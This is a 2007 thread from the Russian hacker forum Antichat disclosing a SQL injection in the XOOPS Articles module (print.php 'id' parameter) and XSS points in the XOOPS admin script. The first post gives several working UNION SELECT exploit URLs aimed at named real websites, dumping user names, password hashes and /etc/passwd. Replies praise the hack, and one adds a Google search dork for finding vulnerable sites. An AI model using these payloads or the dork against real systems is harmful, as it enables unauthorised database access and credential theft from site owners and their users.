ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

[xoops]
  #1  
Старый 02.03.2007, 21:02
Аватар для ice1k
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597

Репутация: 1866


Отправить сообщение для ice1k с помощью ICQ
По умолчанию [xoops]

Сейчас вот нарыл в Xoops'e одну вещь... Нигде в багтраках не видел этой уязвимости...

Программа: Xoops(пока что х3 до какой версии + должен присутствовать модуль - Articles)

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "id" в сценарии print.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример:
http://victim/modules/articles/print.php?id=-1{code}

URL производителя: www.xoops.org

Вот реальные примеры:

Код:
http://www.irc.by/modules/articles/print.php?id=-99+union+select+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(uname,0x71),0x71),AES_DECRYPT(AES_ENCRYPT(pass,0x71),0x71),7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+xoops_users/*
Код:
http://www.xoops2.ru/modules/articles/print.php?id=-99+union+select+1,2,3,4,convert(user()+using+cp1251),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+xoops2_users/*
Код:
http://www.xoops.pl/modules/articles/print.php?id=-99+union+select+1,2,3,4,user(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+manga_users/*
Код:
http://www.dolbin.ru/modules/articles/print.php?id=-99+union+select+1,2,3,4,concat(uname,0x3a,pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+xoops_users/*
Код:
http://www.titanic.com/modules/articles/print.php?id=-99+union+select+1,2,3,4,LOAD_FILE('/etc/passwd'),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+mysql.user/*
(c)ice1k :: AltST

Последний раз редактировалось ice1k; 03.03.2007 в 14:06..
 
Ответить с цитированием

  #2  
Старый 02.03.2007, 21:04
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

зачёт +
молодец
 
Ответить с цитированием

  #3  
Старый 03.03.2007, 00:29
Аватар для ice1k
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597

Репутация: 1866


Отправить сообщение для ice1k с помощью ICQ
По умолчанию

Кстати... Если где-то вдруг это было - отпишитесь плз...
 
Ответить с цитированием

  #4  
Старый 03.03.2007, 01:50
Аватар для CBuH
CBuH
Познающий
Регистрация: 25.01.2007
Сообщений: 67
Провел на форуме:
202498

Репутация: 25
Отправить сообщение для CBuH с помощью ICQ
По умолчанию

неплохо, зачёт адназначна
 
Ответить с цитированием

  #5  
Старый 03.03.2007, 03:16
Аватар для chezz
chezz
Познающий
Регистрация: 19.02.2007
Сообщений: 45
Провел на форуме:
148427

Репутация: 19
Отправить сообщение для chezz с помощью ICQ
По умолчанию

Респект, работает! Ставлю +.
 
Ответить с цитированием

  #6  
Старый 03.03.2007, 14:01
Аватар для ice1k
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597

Репутация: 1866


Отправить сообщение для ice1k с помощью ICQ
По умолчанию

Программа: XOOPS 2.0.16, возможно более ранние версии.

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение.
Уязвимость существует из-за недостаточной обработки входных данных в
параметре "tplset" и "module"(при определенных условиях, приведенных в
примерах) в сценарии /modules/system/admin.php. Удаленный пользователь может
с помощью специально сформированного запроса выполнить произвольный код
сценария в браузере жертвы в контексте безопасности уязвимого сайта. Для
успешной эксплуатации уязвимости целевой пользователь должен быть залогинен
как администратор.

Examples:
Код:
victim.xxx/modules/system/admin.php?fct=tplsets&op=listtpl&tplset=[XSS-here]&moddir=system
Код:
victim.xxx/modules/system/admin.php?fct=modulesadmin&op=install&module=[XSS-here]
URL производителя: http://xoops.org

(с)ice1k :: AltST

Последний раз редактировалось ice1k; 03.03.2007 в 14:04..
 
Ответить с цитированием

  #7  
Старый 03.03.2007, 14:25
Аватар для DIAgen
DIAgen
Познавший АНТИЧАТ
Регистрация: 02.05.2006
Сообщений: 1,191
Провел на форуме:
7364332

Репутация: 1276


По умолчанию

Вот держите сканер этой баги
Цитата:
http://www.google.com/
inurl:"/modules/articles/" Документация

Последний раз редактировалось DIAgen; 03.03.2007 в 14:28..
 
Ответить с цитированием

  #8  
Старый 03.03.2007, 14:26
Аватар для p-range
p-range
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
Провел на форуме:
749524

Репутация: 715
Отправить сообщение для p-range с помощью ICQ
По умолчанию

респект
 
Ответить с цитированием

  #9  
Старый 03.03.2007, 15:17
Аватар для ice1k
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597

Репутация: 1866


Отправить сообщение для ice1k с помощью ICQ
По умолчанию

Цитата:
Сообщение от DIAgen  
Вот держите сканер этой баги
а это ты зря... не нужно "развивать" скрипт-киддисов...
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ